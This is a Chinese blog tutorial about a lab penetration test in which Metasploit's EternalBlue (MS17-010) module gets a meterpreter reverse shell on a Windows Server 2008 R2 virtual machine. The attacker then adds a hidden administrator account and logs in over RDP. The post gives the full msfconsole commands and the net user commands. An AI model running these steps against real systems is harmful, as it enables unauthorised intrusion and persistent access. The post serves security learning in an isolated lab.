渗透测试:metasploit+ms-17-010+Windows2008r2

最新推荐文章于 2023-06-05 20:09:36 发布
最新推荐文章于 2023-06-05 20:09:36 发布
阅读量2.3k 收藏 6
点赞数 4
分类专栏: kali 文章标签: kali metasloit ms_17_010
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36813857/article/details/100188564
版权

渗透测试:metasploit+ms-17-010+Windows2008r2

工具

1 vbox

2 kali

3 win2008r2

最终效果

[外链图片转存失败(img-GChxhmUN-1567346052539)([外链图片转存失败(img-j2OBTJZA-1567346183469)(https://i.imgur.com/DCXVcYL.png)])]

创建一个属于Administrators组的用户admin,并使用admin账户进入系统。

实现步骤

1 使用netdiscover 探测局域网内的主机,目的是发现需要渗透的主机

[外链图片转存失败(img-HKfBdW5L-1567346052550)(https://i.imgur.com/PnUcp26.png)]

现在我们发现了3台主机。

2 使用nmap进行扫描

nmap基本功能有三个

(1)是扫描主机端口,嗅探所提供的网络服务

(2)是探测一组主机是否在线

(3)还可以推断主机所用的操作系统,到达主机经过的路由,系统已开放端口的软件版本

nmap 扫描连续的IP地址的方法是使用“-”将主机位的第一位和最后一位接起来。
[外链图片转存失败(img-XcbwGKsW-1567346052550)(https://i.imgur.com/9pcutXo.png)]

这里我们可以看到192.168.1.4这台主机开放了3389端口,3389端口是一个远程桌面的服务端口,如果连接上了,输入系统管理员的用户名和密码后,将变得可以像操作本机一样操作远程的电脑,因此远程服务器一般都将这个端口修改数值或者关闭。

这个功能在后续的环节有用。

3 测试环境

攻击机:kali

ip:192.168.1.5

靶机:win2008r2

ip:192.168.1.4

4 使用metasploit的ms-17-010 payload

1 metasploit 主界面

[外链图片转存失败(img-hOINAnrp-1567346052552)(https://i.imgur.com/BDRJowZ.png)]

2 搜索ms17_010

[外链图片转存失败(img-HY9hKMPQ-1567346052554)(https://i.imgur.com/wZbpPNI.png)]

search ms17_010

选择第3 个

# 3  
name : exploit/windows/smb/ms17_010_eternalblue
disclosure date : 2017-03-14   
rank : average  
check : No 
description : MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 调用模块 exploit/windows/smb/ms17_010_eternalblue及配置payload
use exploit/windows/smb/ms17_010_eternalblue

查看模块需要设置的

show options

[外链图片转存失败(img-Y48OvuS2-1567346052555)(https://i.imgur.com/pnAggwp.png)]

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.5
rhosts => 192.168.1.5
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

设置目标IP地址及选择payload,查看payload要求
[外链图片转存失败(img-0UvyUpSl-1567346052558)(https://i.imgur.com/Ft3NDqB.png)]
payload 要求设置监听主机,这里写本地kali的ip地址

set lhost 192.168.1.4

最后再查看一下设置

show options

[外链图片转存失败(img-5vwqLgZx-1567346052562)(https://i.imgur.com/LiIsJUW.png)]

4 开始攻击
exploit

[外链图片转存失败(img-vF0NbeIY-1567346052568)(https://i.imgur.com/JSulYsd.png)]

发现是因为把本地kali ip与 远程win2008的ip弄混了
重新设置一下

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.5
lhost => 192.168.1.5
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.4
rhost => 192.168.1.4

再次进行攻击

[外链图片转存失败(img-Q55bI4Rg-1567346052572)(https://i.imgur.com/LSXIrSx.png)]

####5 进shell提权

shell

[外链图片转存失败(img-DFSwnDlQ-1567346052575)(https://i.imgur.com/03jQJUi.png)]

添加用户并将用户加入管理组

然后使用windos cmd命令进行创建用户并加入管理员组

net user qwer asdf123! /add

注意密码要符合复杂性要求

net local group Administrators qwer /add

把admin用户加入本地管理员组

[外链图片转存失败(img-QJxbZl6y-1567346052576)(https://i.imgur.com/pEiXvtM.png)]

6 远程桌面连接登录

这里之前的3389端口可以用到了

[外链图片转存失败(img-etKp7Psm-1567346052578)(https://i.imgur.com/OMKTtNz.png)]

使用创建的qwer用户进行登录
[外链图片转存失败(img-UocTw9bj-1567346052579)(https://i.imgur.com/SAlNUE0.png)]

登录成功

[外链图片转存失败(img-lEmgahgj-1567346052582)(https://i.imgur.com/3cGhz0Q.png)]

信封同学
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
永恒之蓝 MS17-010 漏洞复现
weixin_53409153的博客
07-19 1213
永恒之蓝简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 SMB协议 SMB(Server Message Block)通信协议是微软(Microsoft)和英
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
Zichel77的博客
10-06 2481
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用。这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本。Windows下IP地址为192.168.92.136。就可以看到windows7电脑中新建了这么个文件。看到WIN才说明利用成功,FAIL就是失败。使用的是nmap模块,输入命令进行扫描。开启了两台虚拟机,保证在同一网段下。两台虚拟机在同一网段,故可保持通信。我没这个病毒就不传了哈哈哈哈哈。
ms17-010(永恒之蓝) 漏洞复现与处理
最新发布
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
永恒之蓝 MS17-010漏洞复现
春日野穹
12-21 1642
目录导航 一. 复现环境 二. 漏洞原理 1.漏洞简介 2.漏洞原理代码详解 三. 漏洞复现 1.信息收集 2.漏洞探测 3.漏洞利用 一. 复现环境 工具:msf 攻击机:Kali linux 虚拟机一台 ip: 169.254.93.24 测试机:Windows 2008 r2 虚拟机一台 ip: 169.254.93.243 网络环境:手机WiFi网络USB共享,同一局域网,桥接网络模...
MS17-010永恒之蓝-漏洞利用+修复方法
WEB渗透测试 从入门到萌新
04-21 8213
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 系列文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的
php ms17-010,PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现
weixin_39850365的博客
04-02 387
猫宁!!!参考:“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,危害极大。微软的漏洞2个漏洞公告windows 2008R2镜像从itellme站点获取,种类齐全,比较干净。 记得进行新建,建立系统保留分区哦,用于存放系统引导文件,类似于centos7的/boot分区,可以避免系统无法正常启动。 虚拟机中的Windows 2008 R2一定要设置为网卡桥接模式ip是192.16...
毒蛇:metasploit-framework图形界面图形化内网渗透工具
02-01
Metasploit-Framework是信息安全领域广泛使用的开源渗透测试框架,而Viper则进一步简化了其操作流程,使得内网渗透更加高效。 一、Metasploit-Framework简介 Metasploit-Framework是一个开源项目,由 Rapid7 维护...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
**Metasploit渗透测试指南** 渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入...
MS17-010:MS17-010 Poc Shell 调用Nmap and Metasploit 内网445测试的一款Poc
05-18
永恒之蓝 MS17-010 Scan and Exploit Shell Usage MAC OSX git clone https://github.com/xaiJoker/MS17-010/ cd ms17-010 && chmod +x ms17-010.sh sh ms17-010.sh Linux git clone ...
Metasploit渗透测试指南完整版-pdf
07-23
软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解...
metasploit-4.17.1-2020080301-windows-x64-installer.exe
01-10
metasploit
Metasploit利用ms17_010渗透测试winserv 2008 SP 2
E4
04-27 6889
这次我们利用的是ms17-10对2008服务器进行一次渗透测试。 话不多说QAQ 测试环境: 攻击机:Kali (2018,2) IP:192.168.10.78 靶机:windows server 2008 (SP1) IP:192.168.10.77 因为我的kali是2018年的,已经附带了ms17_010,有些小伙伴的kali还是2016的版本,我这里也贴出来了下载...
Metasploit 利用 MS17-010漏洞(永恒之蓝)
热门推荐
test
11-20 1万+
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166 发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS17-10(永恒之蓝) ...
mestasploit笔记 :MS17-010
dianyan5615的博客
06-12 208
实验环境 操作机 :Kali 2017 操作机IP:172.16.11.2 目标机:Windows 7 目标机IP:172.16.12.2 实验目的 认知Windows远程溢出漏洞的危害 知悉MS17-010漏洞的发现和验证过程 学习Metasploit工具的进阶使用 实...
MS17-010漏洞入侵: 利用MS17-010漏洞入侵Win 2008 R2 上传下载文件 破解密码 远程登录
彭淦淦的博客
05-09 1428
4.2 步骤 实现此案例需要按照如下步骤进行。 1)在kali上启动msfconsole,漏洞攻击如图-17、图-18和图-19所示 图-17 图-18 图-19 2)上传下载文件,如图-20和图-21所示 图-20 图-21 3)破解密码如图-22所示,密码的hash值可以访问www.cmd5.com破解 图-22 4)在kali上新建终端,然后运行...
MSF渗透Win server 2008 R2
妖魔鬼怪快离开的博客
11-15 7586
详细步骤信息收集漏洞探测漏洞利用权限提升权限维持远程桌面痕迹清除 信息收集 使用nmap工具进行扫描,发现发现开放了445端口,尝试利用MS17_010漏洞。 nmap –sV 目标主机IP地址 漏洞探测 2. 1查看漏洞模块 search ms17-010 2. 2使用Auxiliary模块测试目标 选择Auxiliary模块 use auxiliary/scanner/smb/smb_ms17_010 设置目标主机IP并测试 set RHOST 目标主机IP地址 run 漏洞利用 使用ex
Metasploit利用ms17-010入侵windows server 2008r2
覃杨森的博客
02-07 1108
作者:覃杨森 联系邮箱:qinyangsen991@126.com 声明:转载及使用请注明来源 关键字:Metasploitwindows入侵;ms17-010
此更新不适用于您的计算机 kb4012212,这才是正确的全球勒索软件处置方法(含Windows补丁)...
weixin_42347048的博客
07-23 5821
针对近期出现的“永恒之蓝”攻击程序发起的网络攻击事件,目前微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,强烈建议Windows操作系统立即安装这些补丁,本文档介绍了如何更新这些补丁。补丁下载链接微软已经发布 winxp_sp3 至 win10、win2003 至 win2016 的全系列补丁,可以到官方指定位置下载。前提准备建议安装补丁前备份服务器如为虚拟机可通过快照备份。如何确...
计算机系统安全-实验二-metasploit.doc
12-10
本实验旨在深入理解计算机操作系统安全的核心概念,通过实践操作,学习如何利用Metasploit这款强大的渗透测试工具对Windows系统进行安全评估。实验的重点围绕操作系统安全结构、网络渗透原理以及Metasploit的实战...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

信封同学

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值